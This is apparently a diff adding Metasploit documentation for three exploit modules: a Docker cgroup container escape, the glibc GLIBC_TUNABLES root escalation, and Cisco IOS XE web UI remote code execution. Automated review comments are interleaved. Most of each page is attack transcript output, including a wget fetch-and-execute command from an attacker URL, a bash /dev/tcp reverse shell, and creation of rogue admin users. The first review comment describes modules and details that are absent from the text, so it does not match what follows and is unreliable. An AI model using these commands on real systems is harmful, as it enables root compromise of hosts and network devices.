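Review bot: The closing note gives the escalation module as `exploits/linux/local/cve_2021_4034_pwnkit_lpe_pkexec`, but `use` takes the `exploit/` prefix (compare `use exploit/linux/http/vinchin_backup_recovery_cmd_inject` in step 3). The scenario also never runs `getuid`, so the reader cannot tell which user the session runs as; given that the note implies an unprivileged shell, add a `getuid` line to the transcript. Unlike the other docs in this commit, the "Vulnerable Application" section never says what the flaw is (the module name says command injection) and carries no CVE or reference links; and the hardcoded `APIKEY` default (`6e24cc40bfdb6963c04a4f1983c8af71`) is itself a finding worth a sentence, since a fixed key shared by every install means the check is effectively unauthenticated. Smaller items: the Steps list is numbered 1, 2, 4, 5, 6; the options use `####` directly under `##`; step 5 says a payload is optional, yet the expected output relies on `LHOST 192.168.1.5` being set.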
@@ -0,0 +1,139 @@
## Vulnerable Application
This exploit module takes advantage of a Docker image which has either the privileged flag, or SYS_ADMIN Linux capability.
If the host kernel is vulnerable, its possible to escape the Docker image and achieve root on the host operating system.
A vulnerability was found in the Linux kernel's `cgroup_release_agent_write` in the `kernel/cgroup/cgroup-v1.c` function.
This flaw, under certain circumstances, allows the use of the cgroups v1 `release_agent` feature to escalate privileges
and bypass the namespace isolation unexpectedly.
More simply put, cgroups v1 has a feature called `release_agent` that runs a program when a process in the cgroup terminates.
If `notify_on_release` is enabled, the kernel runs the `release_agent` binary as root. By editing the release_agent file,
an attacker can execute their own binary with elevated privileges, taking control of the system. However, the `release_agent`
file is owned by root, so only a user with root access can modify it.
### Docker Setup
`sudo docker run --rm -it --privileged ubuntu:20.04 bash`
or
`sudo docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu:20.04 bash`
You may want to install `wget` to make initial exploitation easier as well:
```
apt-get update
apt-get install -y wget
```
## Verification Steps
1. Install Docker and start a docker container
2. Start msfconsole
3. Get a shell on the docker image as root.
4. Do: `use exploit/linux/local/docker_cgroup_escape`
5. Do: `set lhost [ip]`
6. Do: `set session [#]`
7. Do: `run`
8. You should get a root shell on the host OS.
## Options
## Scenarios
### Ubuntu 18.04 LTS with 4.15.0-96-generic kernel and Docker Ubuntu 20.04
Initial Access
```
resource (docker.rb)> use exploit/multi/script/web_delivery
[*] Using configured payload python/meterpreter/reverse_tcp
resource (docker.rb)> set lhost 1.1.1.1
lhost => 1.1.1.1
resource (docker.rb)> set srvport 8181
srvport => 8181
resource (docker.rb)> set target 7
target => 7
resource (docker.rb)> set payload payload/linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
resource (docker.rb)> run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] Using URL: http://1.1.1.1:8181/QZWpVr8t
[*] Server started.
[*] Run the following command on the target machine:
wget -qO dLFtachL --no-check-certificate http://1.1.1.1:8181/QZWpVr8t; chmod +x dLFtachL; ./dLFtachL& disown
[msf](Jobs:1 Agents:0) exploit(multi/script/web_delivery) >
[*] 2.2.2.2 web_delivery - Delivering Payload (250 bytes)
[*] Sending stage (3045380 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:60288) at 2023-11-28 13:38:39 -0500
[msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...
(Meterpreter 1)(/) > getuid
Server username: root
(Meterpreter 1)(/) > sysinfo
Computer : 172.17.0.2
OS : Ubuntu 20.04 (Linux 4.15.0-96-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
```
Exploit the Docker Escape
```
[msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > use exploit/linux/local/docker_cgroup_escape
[*] Using configured payload cmd/unix/reverse_bash
[msf](Jobs:1 Agents:1) exploit(linux/local/docker_cgroup_escape) > set lhost 1.1.1.1
lhost => 1.1.1.1
[msf](Jobs:1 Agents:1) exploit(linux/local/docker_cgroup_escape) > set lport 9988
lport => 9988
[msf](Jobs:1 Agents:1) exploit(linux/local/docker_cgroup_escape) > set verbose true
verbose => true
[msf](Jobs:1 Agents:1) exploit(linux/local/docker_cgroup_escape) > set session 1
session => 1
[msf](Jobs:1 Agents:1) exploit(linux/local/docker_cgroup_escape) > run
[+] bash -c '0<&181-;exec 181<>/dev/tcp/1.1.1.1/9988;sh <&181 >&181 2>&181'
[*] Started reverse TCP handler on 1.1.1.1:9988
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Unable to determine host OS, this check method is unlikely to be accurate if the host isn't Ubuntu
[+] The target is vulnerable. IF host OS is Ubuntu, kernel version 4.15.0-96-generic is vulnerable
[*] Creating folder for mount: /tmp/eH7EY
[*] Creating directory /tmp/eH7EY
[*] /tmp/eH7EY created
[*] Mounting cgroup
[*] Creating folder in cgroup for exploitation: /tmp/eH7EY/qe0oj7G
[*] Creating directory /tmp/eH7EY/qe0oj7G
[*] /tmp/eH7EY/qe0oj7G created
[*] Enabling notify on release for group qe0oj7G
[*] Determining the host OS path for image
[*] Host OS path for image: /var/lib/docker/overlay2/c8b82079007d1f6dcf042787cd450ffe045595be11c29ca5b119d1802cfaa22f/diff
[*] Setting release_agent path to: /var/lib/docker/overlay2/c8b82079007d1f6dcf042787cd450ffe045595be11c29ca5b119d1802cfaa22f/diff/tmp/KksBaCbF
[*] Uploading payload to /tmp/KksBaCbF
[*] Writing '/tmp/KksBaCbF' (88 bytes) ...
[*] Triggering payload with command: sh -c "echo $$ > /tmp/eH7EY/qe0oj7G/cgroup.procs"
[*] Command shell session 2 opened (1.1.1.1:9988 -> 2.2.2.2:54990) at 2023-11-28 14:39:10 -0500
[*] Cleanup: Unmounting /tmp/eH7EY
FDjfSpoVnqvGmrtBOSRfABBgFMmcSkbT
id
uid=0(root) gid=0(root) groups=0(root)
cat /etc/os-release
NAME="Ubuntu"
VERSION="18.04 LTS (Bionic Beaver)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 18.04 LTS"
VERSION_ID="18.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=bionic
UBUNTU_CODENAME=bionic
```
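Review bot: the `## Options` heading after the Verification Steps is empty; either document the options the scenario actually sets (`lhost`, `lport`, `session`, `verbose`) or drop the heading. The Vulnerable Application paragraph names `cgroup_release_agent_write` in `kernel/cgroup/cgroup-v1.c` but gives no CVE identifier or advisory link, so a reader cannot verify which host kernel versions are affected; add the reference. The caveat printed by the check ("Unable to determine host OS, this check method is unlikely to be accurate if the host isn't Ubuntu") belongs in the description as well, since the check reasons only about Ubuntu kernel version strings and may misreport on other hosts. The last sentence of the description ("only a user with root access can modify it") also leaves the reader wondering how the module gets past that; one sentence saying that root inside a `--privileged` or `CAP_SYS_ADMIN` container can mount the cgroup v1 hierarchy (the "Mounting cgroup" step in the output) and write the file from there would tie the Docker Setup commands to the mechanism. Minor: "its possible" should be "it's possible", and "Docker image" should read "Docker container" in the description and in step 3, since the escape is from a running container, not an image.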
@@ -0,0 +1,169 @@
## Vulnerable Application
A buffer overflow was exists in the GNU C Library's dynamic loader ld.so while processing the GLIBC_TUNABLES environment
variable. This issue allows an local attacker to use maliciously crafted GLIBC_TUNABLES environment variables when
launching binaries with SUID permission to execute code in the context of the root user.
This module targets glibc packaged on Ubuntu and Debian. The specific versions this module targets are:
Ubuntu:
2.35-0ubuntu3.4 > 2.35
2.37-0ubuntu2.1 > 2.37
2.38-1ubuntu6 > 2.38
Debian:
2.31-13-deb11u7 > 2.31
2.36-9-deb12u3 > 2.36
Fedora 37 and 38 and other distributions of linux also come packaged with versions of glibc vulnerable to CVE-2023-4911
however this module does not target them.
### Description
The GLIBC_TUNABLES environment variable is parsed in a loop and is expected to be provided in the following format:
`tunable1=aaa:tunable2=bbb`. If the variable is sent in the following format: `tunable1=tunable2=AAA` due to the
absence of the tunable delimiter `:` in the string, the value `tunable2=AAA` is handled incorrectly and results in a
buffer overflow.
### Setup
Install [Ubuntu 22.04.3](https://releases.ubuntu.com/jammy/ubuntu-22.04.3-desktop-amd64.iso) while ensuring the VM does
not have internet access.
Once booted up, edit `/etc/apt/apt.conf.d/20auto-upgrades` and change `APT::Periodic::Unattended-Upgrade` from `1` to
`0` to ensure to ensure the machine doesn't patch itself.
Ensure that glibc is at version 2.35-0ubuntu3.1 by running the following:
```
msfuser@msfuser-virtual-machine:~$ ldd --version
ldd (Ubuntu GLIBC 2.35-0ubuntu3.1) 2.35
Copyright (C) 2022 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.
```
The target should be exploitable.
## Verification Steps
1. Start `msfconsole`
2. Get a session
3. Do: `use exploit/linux/local/glibc_tunables_priv_esc`
4. Do: `set SESSION [SESSION]`
5. Do: `check`
6. Do: `run`
7. You should get a new *root* session
## Scenarios
### Ubuntu 22.04.3 with 2.35-0ubuntu3.1 installed (ARCH_X64)
```
msf6 exploit(linux/local/glibc_tunables_priv_esc) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/glibc_tunables_priv_esc) > set session -1
session => -1
msf6 exploit(linux/local/glibc_tunables_priv_esc) > set lhost 192.168.123.1
lhost => 192.168.123.1
msf6 exploit(linux/local/glibc_tunables_priv_esc) > set lport 5555
lport => 5555
msf6 exploit(linux/local/glibc_tunables_priv_esc) > options
Module options (exploit/linux/local/glibc_tunables_priv_esc):
Name Current Setting Required Description
---- --------------- -------- -----------
COMPILE Auto yes Compile on target (Accepted: Auto, True, False)
SESSION -1 yes The session to run this module on
Payload options (linux/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.123.1 yes The listen address (an interface may be specified)
LPORT 5555 yes The listen port
Exploit target:
Id Name
-- ----
0 Auto
msf6 exploit(linux/local/glibc_tunables_priv_esc) > run
View the full module info with the info, or info -d command.
[*] Started reverse TCP handler on 192.168.123.1:5555
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. The glibc version (2.35-0ubuntu3.1) found on the target appears to be vulnerable
[+] The Build ID for ld.so: 61ef896a699bb1c2e4e231642b2e1688b2f1a61e is in the list of supported Build IDs for the exploit.
[+] The exploit is running. Please be patient. Receiving a session could take up to 10 minutes.
[*] Sending stage (3045380 bytes) to 192.168.123.228
[*] Meterpreter session 5 opened (192.168.123.1:5555 -> 192.168.123.228:33016) at 2023-12-19 10:53:09 -0500
meterpreter >getuid
Server username: root
meterpreter > sysinfo
Computer : 192.168.123.228
OS : Ubuntu 22.04 (Linux 6.2.0-35-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
```
### Debian 12 with 2.36-9-deb12u1 installed (ARCH_X64)
```
msf6 exploit(linux/local/glibc_tunables_priv_esc) > options
Module options (exploit/linux/local/glibc_tunables_priv_esc):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION -1 yes The session to run this module on
Payload options (linux/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.123.1 yes The listen address (an interface may be specified)
LPORT 5555 yes The listen port
Exploit target:
Id Name
-- ----
0 Auto
View the full module info with the info, or info -d command.
msf6 exploit(linux/local/glibc_tunables_priv_esc) > set lport 5555
lport => 5555
msf6 exploit(linux/local/glibc_tunables_priv_esc) > set lhost 192.168.123.1
lhost => 192.168.123.1
msf6 exploit(linux/local/glibc_tunables_priv_esc) > run
[*] Started reverse TCP handler on 192.168.123.1:5555
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. The glibc version (2.36-9+deb12u1) found on the target appears to be vulnerable
[+] The Build ID for ld.so: a99db3715218b641780b04323e4ae5953d68a927 is in the list of supported Build IDs for the exploit.
[+] The exploit is running. Please be patient. Receiving a session could take up to 10 minutes.
[*] Sending stage (3045380 bytes) to 192.168.123.229
[*] Meterpreter session 3 opened (192.168.123.1:5555 -> 192.168.123.229:50370) at 2023-12-19 12:21:34 -0500
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : debian.test.com
OS : Debian 12.1 (Linux 6.1.0-10-amd64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
```
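Review bot: the affected-version list under "This module targets glibc packaged on Ubuntu and Debian" is ambiguous: entries such as `2.35-0ubuntu3.4 > 2.35` read as if 2.35-0ubuntu3.4 is itself vulnerable, while the Setup section pins 2.35-0ubuntu3.1 and disables unattended upgrades so the machine does not patch itself; state explicitly which package version carries the fix and write each entry as a range ("2.35 up to, but not including, 2.35-0ubuntu3.4"). The Debian version strings are written with a hyphen (`2.31-13-deb11u7`, `2.36-9-deb12u3`, and the scenario heading `2.36-9-deb12u1`) while the module's own check output reports `2.36-9+deb12u1`; use the `+deb` form the package manager reports so users can compare like with like. The run output shows the exploit depends on the ld.so Build ID being in a supported list, and the options table shows a `COMPILE` option, but neither is documented; add an Options section saying what happens on a target whose Build ID is not in the list and when `COMPILE` should be set. Minor wording: "A buffer overflow was exists" should be "A buffer overflow exists", "an local attacker" should be "a local attacker", and "to ensure to ensure" is doubled.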
@@ -0,0 +1,398 @@
## Vulnerable Application
This module leverages both CVE-2023-20198 and CVE-2023-20273 against vulnerable instances of Cisco IOS XE
devices which have the Web UI exposed. An attacker can execute a payload with root privileges.
The vulnerable IOS XE versions are:
16.1.1, 16.1.2, 16.1.3, 16.2.1, 16.2.2, 16.3.1, 16.3.2, 16.3.3, 16.3.1a, 16.3.4,
16.3.5, 16.3.5b, 16.3.6, 16.3.7, 16.3.8, 16.3.9, 16.3.10, 16.3.11, 16.4.1, 16.4.2,
16.4.3, 16.5.1, 16.5.1a, 16.5.1b, 16.5.2, 16.5.3, 16.6.1, 16.6.2, 16.6.3, 16.6.4,
16.6.5, 16.6.4s, 16.6.4a, 16.6.5a, 16.6.6, 16.6.5b, 16.6.7, 16.6.7a, 16.6.8, 16.6.9,
16.6.10, 16.7.1, 16.7.1a, 16.7.1b, 16.7.2, 16.7.3, 16.7.4, 16.8.1, 16.8.1a, 16.8.1b,
16.8.1s, 16.8.1c, 16.8.1d, 16.8.2, 16.8.1e, 16.8.3, 16.9.1, 16.9.2, 16.9.1a, 16.9.1b,
16.9.1s, 16.9.1c, 16.9.1d, 16.9.3, 16.9.2a, 16.9.2s, 16.9.3h, 16.9.4, 16.9.3s, 16.9.3a,
16.9.4c, 16.9.5, 16.9.5f, 16.9.6, 16.9.7, 16.9.8, 16.9.8a, 16.9.8b, 16.9.8c, 16.10.1,
16.10.1a, 16.10.1b, 16.10.1s, 16.10.1c, 16.10.1e, 16.10.1d, 16.10.2, 16.10.1f, 16.10.1g,
16.10.3, 16.11.1, 16.11.1a, 16.11.1b, 16.11.2, 16.11.1s, 16.11.1c, 16.12.1, 16.12.1s,
16.12.1a, 16.12.1c, 16.12.1w, 16.12.2, 16.12.1y, 16.12.2a, 16.12.3, 16.12.8, 16.12.2s,
16.12.1x, 16.12.1t, 16.12.2t, 16.12.4, 16.12.3s, 16.12.1z, 16.12.3a, 16.12.4a, 16.12.5,
16.12.6, 16.12.1z1, 16.12.5a, 16.12.5b, 16.12.1z2, 16.12.6a, 16.12.7, 16.12.9, 16.12.10,
17.1.1, 17.1.1a, 17.1.1s, 17.1.2, 17.1.1t, 17.1.3, 17.2.1, 17.2.1r, 17.2.1a, 17.2.1v,
17.2.2, 17.2.3, 17.3.1, 17.3.2, 17.3.3, 17.3.1a, 17.3.1w, 17.3.2a, 17.3.1x, 17.3.1z,
17.3.3a, 17.3.4, 17.3.5, 17.3.4a, 17.3.6, 17.3.4b, 17.3.4c, 17.3.5a, 17.3.5b, 17.3.7,
17.3.8, 17.4.1, 17.4.2, 17.4.1a, 17.4.1b, 17.4.1c, 17.4.2a, 17.5.1, 17.5.1a, 17.5.1b,
17.5.1c, 17.6.1, 17.6.2, 17.6.1w, 17.6.1a, 17.6.1x, 17.6.3, 17.6.1y, 17.6.1z, 17.6.3a,
17.6.4, 17.6.1z1, 17.6.5, 17.6.6, 17.7.1, 17.7.1a, 17.7.1b, 17.7.2, 17.10.1, 17.10.1a,
17.10.1b, 17.8.1, 17.8.1a, 17.9.1, 17.9.1w, 17.9.2, 17.9.1a, 17.9.1x, 17.9.1y, 17.9.3,
17.9.2a, 17.9.1x1, 17.9.3a, 17.9.4, 17.9.1y1, 17.11.1, 17.11.1a, 17.12.1, 17.12.1a,
17.11.99SW
## Testing
This module was tested against IOS XE version 16.12.3 and version 17.3.2. To test this module you will need to either:
* Acquire a hardware device running one of the vulnerable firmware versions listed above.
Or
* Setup a virtualized environment.
* A [CSR1000V](https://www.cisco.com/c/en/us/products/routers/cloud-services-router-1000v-series/index.html) device
can be virtualized using [GNS3](https://www.gns3.com/) and VMWare Workstation/Player. Follow the
[Windows setup guide](https://docs.gns3.com/docs/getting-started/installation/windows) to install GNS3 and the
[topology guide](https://docs.gns3.com/docs/getting-started/your-first-gns3-topology) to learn how GNS3 can be used.
* A suitable firmware image for testing would be `csr1000v-universalk9.16.12.03-serial.qcow2`.
* When setting up GNS3, run the `GNS3 2.2.43` Virtual Machine for deploying QEMU based devices.
* Create a new CSR1000v instance as a QEMU device.
* The CSR1000v device's first ethernet adapter `Gi1` should be connected to a Cloud device, whose adapter was bridged
to the physical adapter on the host machine, allowing an IP address to be assigned via DHCP, and allowing the Web UI to
be accessible to a remote attacker.
* When the virtual router has booted up, you must enable the vulnerable WebUI component. From a serial console on
the device:
```
Router>enable
Router#config
Router(config)#ip http server
router(config)#ip http secure-server
router(config)#ip http authentication local
router(config)#username admin privilege 15 secret qwerty
router(config)#exit
Router#copy running-config startup-config
```
* You should now be able to access the WebUI via https://TARGET_IP_ADDRESS/webui and login with admin:qwerty
## Verification Steps
1. Start msfconsole
2. `use exploit/linux/misc/cisco_ios_xe_rce`
3. `set RHOST <TARGET_IP_ADDRESS>`
4. `set target 0`
5. `set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp`
6. `check`
7. `exploit`
## Options
### CISCO_VRF_NAME
We allow a user to specify the VRF name to route traffic for the payloads network transport. The default of
'global' should work, but exposing this as an option will allow for usage in more complex network setups.
A user could leverage the auxiliary module auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198 to
inspect a devices configuration to see an appropriate VRF to use.
### CISCO_CMD_TIMEOUT
We may need to try and execute a command a second time if it fails the first time. This option is the maximum
number of seconds to keep trying.
## Scenarios
To support a broad set of available payloads, we support both a Linux target and a Unix Target (IOS XE is Linux based).
This allows for native Linux payloads to be used, but also payloads like Python meterpreter or a Bash shell.
### Linux Command (IOS XE 17.3.2)
```
msf6 exploit(linux/misc/cisco_ios_xe_rce) > set RHOST 192.168.86.58
RHOST => 192.168.86.58
msf6 exploit(linux/misc/cisco_ios_xe_rce) > set target 0
target => 0
msf6 exploit(linux/misc/cisco_ios_xe_rce) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
[+] 192.168.86.58:443 - The target is vulnerable. Cisco IOS XE Software, Version 17.03.02
msf6 exploit(linux/misc/cisco_ios_xe_rce) > show options
Module options (exploit/linux/misc/cisco_ios_xe_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
CISCO_CMD_TIMEOUT 30 yes The maximum timeout (in seconds) to wait when trying to execute a command.
CISCO_VRF_NAME global yes The virtual routing and forwarding (vrf) name to use. Both 'fwd' or 'global' have been tested to work.
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.86.58 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 443 yes The target port (TCP)
SSL true no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILENAME dDrTvTlqxwoK no Name to use on remote system when storing payload; cannot contain spaces.
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
FETCH_WRITABLE_DIR yes Remote writable dir to store payload; cannot contain spaces.
LHOST 192.168.86.42 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Linux Command
View the full module info with the info, or info -d command.
msf6 exploit(linux/misc/cisco_ios_xe_rce) > exploit
[*] Started reverse TCP handler on 192.168.86.42:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Cisco IOS XE Software, Version 17.03.02
[*] Created privilege 15 user 'sqVXixoV' with password 'ZiPbsXBu'
[*] Removing user 'sqVXixoV'
[*] Sending stage (3045380 bytes) to 192.168.86.58
[*] Meterpreter session 6 opened (192.168.86.42:4444 -> 192.168.86.58:64970) at 2023-11-06 17:01:06 +0000
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : router
OS : (Linux 4.19.106)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
```
```
msf6 exploit(linux/misc/cisco_ios_xe_rce) > set payload cmd/linux/http/x64/shell/reverse_tcp
payload => cmd/linux/http/x64/shell/reverse_tcp
msf6 exploit(linux/misc/cisco_ios_xe_rce) > exploit
[*] Started reverse TCP handler on 192.168.86.42:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Cisco IOS XE Software, Version 17.03.02
[*] Created privilege 15 user 'pfGnCwkI' with password 'YhTwxBLK'
[*] Removing user 'pfGnCwkI'
[*] Sending stage (38 bytes) to 192.168.86.58
[*] Command shell session 7 opened (192.168.86.42:4444 -> 192.168.86.58:64994) at 2023-11-06 17:01:44 +0000
id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:polaris_nginx_t:s0
uname -a
Linux router 4.19.106 #1 SMP Fri Oct 2 17:55:01 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
exit
[*] 192.168.86.58 - Command shell session 7 closed.
msf6 exploit(linux/misc/cisco_ios_xe_rce) >
```
### Linux Command (IOS XE 16.12.3)
```
msf6 exploit(linux/misc/cisco_ios_xe_rce) > show options
Module options (exploit/linux/misc/cisco_ios_xe_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
CISCO_CMD_TIMEOUT 30 yes The maximum timeout (in seconds) to wait when trying to execute a command.
CISCO_VRF_NAME global yes The virtual routing and forwarding (vrf) name to use. Both 'fwd' or 'global' have been tested to work.
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.86.59 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 443 yes The target port (TCP)
SSL true no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILENAME ytfnShmfT no Name to use on remote system when storing payload; cannot contain spaces.
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
FETCH_WRITABLE_DIR yes Remote writable dir to store payload; cannot contain spaces.
LHOST 192.168.86.42 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Linux Command
View the full module info with the info, or info -d command.
msf6 exploit(linux/misc/cisco_ios_xe_rce) > check
[+] 192.168.86.59:443 - The target is vulnerable. Cisco IOS XE Software, Version 16.12.03
msf6 exploit(linux/misc/cisco_ios_xe_rce) > exploit
[*] Started reverse TCP handler on 192.168.86.42:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Cisco IOS XE Software, Version 16.12.03
[*] Created privilege 15 user 'lwWQIDaS' with password 'dADCGJpS'
[*] Removing user 'lwWQIDaS'
[*] Sending stage (3045380 bytes) to 192.168.86.59
[*] Meterpreter session 2 opened (192.168.86.42:4444 -> 192.168.86.59:56554) at 2023-11-06 16:41:06 +0000
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : router
OS : (Linux 4.19.64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
```
```
msf6 exploit(linux/misc/cisco_ios_xe_rce) > set target 0
target => 0
msf6 exploit(linux/misc/cisco_ios_xe_rce) > set payload cmd/linux/http/x64/shell/reverse_tcp
payload => cmd/linux/http/x64/shell/reverse_tcp
msf6 exploit(linux/misc/cisco_ios_xe_rce) > exploit
[*] Started reverse TCP handler on 192.168.86.42:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Cisco IOS XE Software, Version 16.12.03
[*] Created privilege 15 user 'NjAmOioM' with password 'tOHjWGyw'
[*] Removing user 'NjAmOioM'
[*] Sending stage (38 bytes) to 192.168.86.59
[*] Command shell session 5 opened (192.168.86.42:4444 -> 192.168.86.59:56598) at 2023-11-06 16:44:48 +0000
id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:polaris_nginx_t:s0
uname -a
Linux router 4.19.64 #1 SMP Wed Dec 11 10:30:30 PST 2019 x86_64 x86_64 x86_64 GNU/Linux
exit
[*] 192.168.86.59 - Command shell session 5 closed.
msf6 exploit(linux/misc/cisco_ios_xe_rce) >
```
### Unix Target (IOS XE 17.3.2)
```
msf6 exploit(linux/misc/cisco_ios_xe_rce) > set target 1
target => 1
msf6 exploit(linux/misc/cisco_ios_xe_rce) > set payload cmd/unix/python/meterpreter/reverse_tcp
payload => cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(linux/misc/cisco_ios_xe_rce) > exploit
[*] Started reverse TCP handler on 192.168.86.42:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Cisco IOS XE Software, Version 17.03.02
[*] Created privilege 15 user 'JAonVuJS' with password 'vYecWhWk'
[*] Removing user 'JAonVuJS'
[*] Sending stage (24772 bytes) to 192.168.86.58
[*] Meterpreter session 8 opened (192.168.86.42:4444 -> 192.168.86.58:65016) at 2023-11-06 17:03:34 +0000
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : router
OS : Linux 4.19.106 #1 SMP Fri Oct 2 17:55:01 UTC 2020
Architecture : x64
Meterpreter : python/linux
meterpreter >
```
```
msf6 exploit(linux/misc/cisco_ios_xe_rce) > set payload cmd/unix/reverse_bash
payload => cmd/unix/reverse_bash
msf6 exploit(linux/misc/cisco_ios_xe_rce) > exploit
[*] Started reverse TCP handler on 192.168.86.42:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Cisco IOS XE Software, Version 17.03.02
[*] Created privilege 15 user 'TVtEhbdd' with password 'NtRvujcZ'
[*] Removing user 'TVtEhbdd'
[*] Command shell session 9 opened (192.168.86.42:4444 -> 192.168.86.58:65036) at 2023-11-06 17:04:28 +0000
id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:polaris_nginx_t:s0
uname -a
Linux router 4.19.106 #1 SMP Fri Oct 2 17:55:01 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
exit
[*] 192.168.86.58 - Command shell session 9 closed.
msf6 exploit(linux/misc/cisco_ios_xe_rce) >
```
### Unix Target (IOS XE 16.12.3)
```
msf6 exploit(linux/misc/cisco_ios_xe_rce) > set target 1
target => 1
msf6 exploit(linux/misc/cisco_ios_xe_rce) > set payload cmd/unix/python/meterpreter/reverse_tcp
payload => cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(linux/misc/cisco_ios_xe_rce) > show options
Module options (exploit/linux/misc/cisco_ios_xe_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
CISCO_CMD_TIMEOUT 30 yes The maximum timeout (in seconds) to wait when trying to execute a command.
CISCO_VRF_NAME global yes The virtual routing and forwarding (vrf) name to use. Both 'fwd' or 'global' have been tested to work.
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.86.59 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 443 yes The target port (TCP)
SSL true no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
Payload options (cmd/unix/python/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.86.42 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
1 Unix Command
View the full module info with the info, or info -d command.
msf6 exploit(linux/misc/cisco_ios_xe_rce) > check
[+] 192.168.86.59:443 - The target is vulnerable. Cisco IOS XE Software, Version 16.12.03
msf6 exploit(linux/misc/cisco_ios_xe_rce) > exploit
[*] Started reverse TCP handler on 192.168.86.42:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Cisco IOS XE Software, Version 16.12.03
[*] Created privilege 15 user 'pJaWZBTl' with password 'KlcuLPaJ'
[*] Removing user 'pJaWZBTl'
[*] Sending stage (24772 bytes) to 192.168.86.59
[*] Meterpreter session 3 opened (192.168.86.42:4444 -> 192.168.86.59:56572) at 2023-11-06 16:42:36 +0000
meterpreter > getuid
Server username: root
meterpreter > sysinfo
